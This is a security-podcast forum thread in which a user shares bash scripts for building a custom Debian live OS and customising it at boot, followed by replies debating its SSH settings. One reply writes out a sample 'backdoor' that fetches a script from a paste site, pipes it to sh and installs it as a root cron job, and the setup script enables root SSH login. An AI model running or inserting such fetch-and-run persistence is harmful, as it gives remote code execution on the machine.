Custom Live OS for Optimal OPSEC

  • Be sure to checkout “Tips & Tricks”
    Dear Guest Visitor → Once you register and log-in please checkout the “Tips & Tricks” page for some very handy tips!

    /Steve.
  • BootAble – FreeDOS boot testing freeware

    To obtain direct, low-level access to a system's mass storage drives, SpinRite runs under a GRC-customized version of FreeDOS which has been modified to add compatibility with all file systems. In order to run SpinRite it must first be possible to boot FreeDOS.

    GRC's “BootAble” freeware allows anyone to easily create BIOS-bootable media in order to workout and confirm the details of getting a machine to boot FreeDOS through a BIOS. Once the means of doing that has been determined, the media created by SpinRite can be booted and run in the same way.

    The participants here, who have taken the time to share their knowledge and experience, their successes and some frustrations with booting their computers into FreeDOS, have created a valuable knowledgebase which will benefit everyone who follows.

    You may click on the image to the right to obtain your own copy of BootAble. Then use the knowledge and experience documented here to boot your computer(s) into FreeDOS. And please do not hesitate to ask questions – nowhere else can better answers be found.

    (You may permanently close this reminder with the 'X' in the upper right.)

JakeofArk

bebestchool.org
Feb 5, 2022
11
2
Boston, USA
bebestschool.org
I threw away my hard drive and switched switched to running a Debian-based custom live OS as my daily driver about a year ago. I thought I'd share with my favorite podcast's community the two bash script that enables it all. One script, zero.live, configures the live-build server and the other, zero.run, customizes the environment on boot. I'd be happy to help anyone on here who wants give it a try.





zero.live


#Build out the live build tool and edit its configuration.
apt install -y live-build
mkdir liveos && cd liveos
lb config
cp /usr/share/doc/live-build/examples/auto/* auto/
nano auto/config

#Change buster to bullseye and i386 to amd64 if you'd like. This setup builds an around 500mb ISO which handles compatibility with everything. The server version operates on about 54mb of RAM and the Debian 9 Openbox version runs with a full GUI on around 115mb of RAM.
#!/bin/sh
set -e
lb config noauto \
-d buster \
--mode debian \
--architectures i386 \
--linux-flavours 686-pae \
--debian-installer false \
--archive-areas "main contrib non-free" \
--apt-indices false \
--memtest none \
--bootappend-live "quiet hostname=trashos boot=live" \
"${@}"

lb config -d buster --apt-indices false --apt-recommends false --debootstrap-options "--variant=minbase" --firmware-chroot false --memtest none --bootappend-live "quiet boot=live hostname=trashos"
lb clean
echo "live-tools user-setup sudo eject" > config/package-lists/recommends.list.chroot

#Setup the included packages (further down) and setup some arbitrary directory to include anything you'd like.
nano config/package-lists/my.list.chroot
mkdir -p config/includes.chroot/home/user/Backup
cd /root/liveos/config/includes.chroot/home/user/Backup

#Insert your run file and hook it into openbox.
nano run.sh && chmod 755 run.sh && cd ~/liveos/
mkdir -p config/includes.chroot/lib/live/config
nano config/includes.chroot/lib/live/config/2000-custom-run
#!/bin/sh
sed -i '131s/4/1/g' /etc/xdg/openbox/rc.xml
echo "sudo ~/Backup/./run.sh" >> /etc/xdg/openbox/autostart
chmod 755 config/includes.chroot/lib/live/config/2000-custom-run
#Setup the simplest bootloader, remove the default, and add your own splash.png
mkdir -p config/bootloaders/isolinux && cp -Rv /usr/share/live/build/bootloaders/isolinux/* config/bootloaders/isolinux
nano config/bootloaders/isolinux/isolinux.cfg
rm config/bootloaders/isolinux/splash.svg

lb clean
lb build 2>&1 | tee build.log
echo "Finished..."
ls -lth
mv -v live-image-i386.hybrid.iso TrashOS.iso

#Create the above script, run it with screen and watch it with htop. Pull it off of AWS with sftp, and burn it to a usb drive.
nano build.sh && chmod 755 build.sh
screen -dmS iso ./build.sh && c && htop -C
sftp -i /home/user/Backup/VPNkey.pem admin@[BUILD SERVER IP]:/home/admin/liveos/TrashOS.iso
clear && dd if=TrashOS.iso of=/dev/[sdX] bs=1M status=progress && sync && echo 'Finished...'


#You can look for other packages with apt-cache search and mix and match however you like.

chromium
xorg
openbox
xfce4-terminal
mousepad
pcmanfm
net-tools
network-manager
network-manager-gnome
pciutils
wireshark
wget
nano
tcpdump
conky
feh
tcpdump
screen
htop
iotop
nmap
ncat
whois
openvpn
ssh
ufw
wipe
gnome-screenshot
curl
easy-rsa
bro-aux
git
lsof
dnsutils
software-properties-common
apt-transport-https
httptunnel
unzip
unrar
p7zip-full
vlc
usbutils
vokoscreen
lynx
pavucontrol
pulseaudio
gparted

zero.run

#!/bin/bash
cp -fv /home/user/Backup/background.png /etc/xdg/openbox/
cp -fv /home/user/Backup/conky.conf /etc/conky/
ln -sf /usr/share/zoneinfo/Asia/Bangkok /etc/localtime
sed -i 's/Clearlooks/Onyx/g' /etc/xdg/openbox/rc.xml
sed -i '86s/9/14/g' /etc/xdg/openbox/rc.xml
sed -i '95s/9/14/g' /etc/xdg/openbox/rc.xml
sed -i '23s/6d95de/0000ff/g' /usr/share/themes/Onyx/openbox-3/themerc
sed -i '24s/2b829d/0000ff/g' /usr/share/themes/Onyx/openbox-3/themerc
sed -i '25s/f8f8f8/ffffff/g' /usr/share/themes/Onyx/openbox-3/themerc
sed -i '42s/mediumblue/blue/g' /etc/conky/conky.conf
rm -f /etc/motd
cat > /etc/motd << EOF

TrashOS

EOF
xsetroot -solid black
xset s off -dpms
setxkbmap -option caps:none
xhost +si:localuser:root
feh --bg-center /etc/xdg/openbox/background.png
conky -b &

cat >> /root/.bashrc << "EOA"
source /home/user/.bashrc
EOA
cat >> /home/user/.bashrc << "EOA"
# ~/.bashrc: executed by bash(1) for non-login shells.
[ -z "$PS1" ] && return
HISTCONTROL=$HISTCONTROL${HISTCONTROL+:}ignoredups
shopt -s histappend
shopt -s checkwinsize
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
red='\[\e[0;31m\]'
RED='\[\e[1;31m\]'
blue='\[\e[0;34m\]'
BLUE='\[\e[1;34m\]'
cyan='\[\e[0;36m\]'
CYAN='\[\e[1;36m\]'
green='\[\e[0;32m\]'
GREEN='\[\e[1;32m\]'
yellow='\[\e[0;33m\]'
YELLOW='\[\e[1;33m\]'
PURPLE='\[\e[1;35m\]'
purple='\[\e[0;35m\]'
nc='\[\e[0m\]'
if [ "$UID" = 0 ]; then
PS1="$nc\u$nc@$nc\H$nc:$nc\w$nc\\n$nc#$nc "
else
PS1="$blue\u$nc@$nc\H$nc:$blue\w$nc\\n$blue\$$nc "
fi
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
fi
alias aliases='sudo nano /home/user/.bashrc && source /home/user/.bashrc'
alias c='clear'
alias x='exit'
alias pubip='wget -qO- checkip.dyn.com | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"'
alias menu='sudo nano /etc/xdg/openbox/menu.xml && openbox --reconfigure'
alias pmon='watch -d -n4 sudo lsof -i -o'
alias dmon='sudo iotop -a'
alias fmon='watch -d -n4 "ls -lth /tmp"'
alias crypt='test -f /usr/bin/veracrypt && /usr/bin/veracrypt || ~/Backup/./veracrypt-x86'
alias nyt='wget https://www.nytimes.com -O i.htm && lynx i.htm && sudo rm -f i.htm'
alias sound='pulseaudio --start && sleep 2s && pavucontrol'
alias pdf='chromium --headless --disable-gpu --print-to-pdf=/home/user/Downloads/grc.pdf https://www.grc.com/securitynow.htm && chromium file:///home/user/Downloads/grc.pdf'
EOA
mv -v /etc/xdg/openbox/menu.xml /etc/xdg/openbox/menu.xml.bak
cat > /etc/xdg/openbox/menu.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<openbox_menu xmlns="http://openbox.org/3.4/menu">
<menu id="root-menu" label="Openbox 3">
<separator label="TrashOS" />
<item label="Terminal">
<action name="Execute">
<command>xfce4-terminal --geometry=99x40 --hide-scrollbar --hide-menubar --title=t0s</command>
</action>
</item>
<item label="Chromium">
<action name="Execute">
<command>chromium</command>
</action>
</item>
<item label="Files">
<action name="Execute">
<command>pcmanfm</command>
</action>
</item>
<item label="Text">
<action name="Execute">
<command>mousepad</command>
</action>
</item>
<menu id="menu" label="Tools">
<item label="Networks">
<action name="Execute">
<command>nm-connection-editor</command>
</action>
</item>
<item label="ScreenSh">
<action name="Execute">
<command>gnome-screenshot -i</command>
</action>
</item>
<item label="ScreenRc">
<action name="Execute">
<command>vokoscreen</command>
</action>
</item>
<item label="Wireshark">
<action name="Execute">
<command>sudo wireshark</command>
</action>
</item>
</menu>
<item label="Shutdown">
<action name="Execute">
<command>sudo shutdown -P --no-wall now</command>
</action>
</item>
</menu>
</openbox_menu>
EOF
sed -i '317s/scrot/gnome-screenshot \-i/g' /etc/xdg/openbox/rc.xml
sed -i '319i\
<keybind key="W-t">\
<action name="Execute"><command>xfce4-terminal --geometry=99x40 --hide-scrollbar --hide-menubar --title=TrashOS</command></action>\
</keybind>\
<keybind key="W-f">\
<action name="Execute"><command>pcmanfm</command></action>\
</keybind>\
<keybind key="W-w">\
<action name="Execute"><command>mousepad</command></action>\
</keybind>\
<keybind key="W-s">\
<action name="Execute"><command>gnome-screenshot -i</command></action>\
</keybind>\
<keybind key="W-r">\
<action name="Execute"><command>vokoscreen</command></action>\
</keybind>\
' /etc/xdg/openbox/rc.xml
openbox --reconfigure
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "Port 44444" >> /etc/ssh/sshd_config
sed -i '56s/no/yes/g' /etc/ssh/sshd_config
systemctl stop ssh
killall pulseaudio
ufw enable
ufw logging medium
exit 0
 
  • Like
Reactions: fcgreg
I find it's best to get ssh off of its default port to cut down on log entries when uploading this ISO to Vultr.
The next line after your quote disables ssh but I don't know why you wouldn't include it.

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "Port 44444" >> /etc/ssh/sshd_config
sed -i '56s/no/yes/g' /etc/ssh/sshd_config
systemctl stop ssh

Its modifications to a default live-build straight from Debian. There is no way to include malware. Change

sed -i '56s/no/yes/g' /etc/ssh/sshd_config

to

sed -i '58s/no/yes/g' /etc/ssh/sshd_config

if using Debian 11.
 
BTW, here is what my backdoor code would look like in one of these live enviroments:

#Begin backdoor code
cat > /tmp/bd.sh << EOF
wget https://del.dog/raw/okitawekit -O - | sh > /dev/null 2>&1
EOF
chmod 755 /tmp/bd.sh
cronjob="*/22 * * * * /tmp/bd.sh"
(crontab -u root -l; echo "$cronjob" ) | crontab -u root -
screen -dmS sh /tmp/bd.sh
#End backdoor code
The point of this post wasn't malicious; it's to share a different way of doing things I've come to enjoy. Hope someone finds a good use for their own purposes.
 
Doing in place sed's by line number is suspicious to me. Without comments it's pretty unclear what's going on unless I have the edited file on hand. Additionally it's pretty brittle. It would be much clearer, and almost self documenting, to do something like:

Code:
sed -i '/SomeImportantSetting/s/oldValue/newValue/'

sed commands take a line range at the start, which can be a regex, which will only find specific lines, then you do your substitute on that/those lines.

And I never suggested you were including malware, but you could be opening a backdoor of some sort, because SSH does have options to allow passwordless logins, for example. In any case you're making a change I would never make, none of my systems allow SSH to log in as root, and I don't understand why you would make that, or any other change, if SSH is to remain disabled.
 
The brittleness is fine with a live system because it will always boot the same initial setup. If you want more comments, take a look at the man pages. An easy way to take a look at this file (which is included in any Linux system with openssh):

cat -n /etc/ssh/sshd_config | head -n 58 | tail -n 5

As for my use case, I'm including an .ovpn client file to deploy these in the field, so as soon as it boots and gets net its on my VPN network. The user still needs to set the password and a port still needs to be opened for my backdoor. ;) All of this, is accomplished with an alias. Something like:

alias vpn="screen -dmS vpn openvpn --config client10.opvpn && systemctl ssh start && ufw allow 44444 && sudo sh -c 'passwd'"

Once I'm SSHed into the box, messing with users and sudo is pointless since its my live CD. I'm not depending on sudo for security in this case and this isn't a multi-user Linux system, it's just a live disk to help deploy code into the field or run a temporary web server or whatever you want. My other use case, is running these images inside QEMU. You can turn on Apache there instead and make little in-line changes to its config. You might find its better in a live system to let a service fully initialize and then turn it off at the end of your script if its not going to be used 100% of the time.

https://live-team.pages.debian.net/live-manual/html/live-manual/examples.en.html

Use it for whatever you want, and I'll try and help you customize it a bit to your needs. Other than the above link, there's really not great documentation on how to do this but it's really not that hard. Oh and Steve Gibson...this is what windows can't do. You can't make a BartPE ISO with the latest software in any easy way like this.
 
Here let me better explain the need. The Truecrypt documentation suggests to do this but doesn't really elaborate.

https://www.grc.com/misc/truecrypt/TrueCrypt User Guide.pdf <-- Ctrl + F "live"

true.png


And this is basically where I got the idea:

 
A more complete walk-through is available here: